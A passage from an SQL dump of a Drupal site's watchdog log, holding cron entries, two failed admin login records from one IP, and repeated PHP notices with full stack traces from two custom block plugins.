@module_previous_cron() took @time.',_binary 'a:2:{s:16:\"@module_previous\";s:6:\"system\";s:5:\"@time\";s:7:\"83.17ms\";}',5,'','http://www.clidentcastelo.pt/img/0315/840.png','','69.171.251.26',1580442659),(4602,0,'cron','Cron run completed.',_binary 'a:0:{}',5,'','http://www.clidentcastelo.pt/img/0315/840.png','','69.171.251.26',1580442659),(4603,0,'user','Login attempt failed for %user.',_binary 'a:1:{s:5:\"%user\";s:5:\"admin\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580444822),(4604,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:50:\"Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\";s:5:\"%file\";s:97:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:7980:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#43 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#44 {main}\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580444822),(4605,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:46:\"Drupal\\support\\Plugin\\Block\\NewsBlock->build()\";s:5:\"%file\";s:93:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:7972:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\NewsBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#43 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#44 {main}\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580444822),(4606,0,'user','Login attempt failed from %ip.',_binary 'a:1:{s:3:\"%ip\";s:11:\"5.188.62.25\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580445891),(4607,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:50:\"Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\";s:5:\"%file\";s:97:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:7980:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#43 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#44 {main}\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580445891),(4608,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:46:\"Drupal\\support\\Plugin\\Block\\NewsBlock->build()\";s:5:\"%file\";s:93:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:7972:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 